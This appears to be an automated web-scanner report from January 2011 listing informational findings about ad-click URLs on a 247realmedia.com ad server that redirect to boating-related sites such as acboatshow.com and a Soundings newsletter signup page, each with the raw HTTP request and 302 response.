Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050539924/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050539924/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050539924/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:16:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050849505/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050849505/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050849505/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2054216298/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2054216298/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2054216298/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2063106975/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2063106975/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2063106975/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2069352430/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2069352430/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2069352430/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2071009563/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2071009563/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2071009563/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2082217498/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2082217498/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2082217498/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2085906817/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2085906817/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2085906817/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2098585488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2098585488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2098585488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:30:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102804392/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102804392/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102804392/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2106371467/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2106371467/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2106371467/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
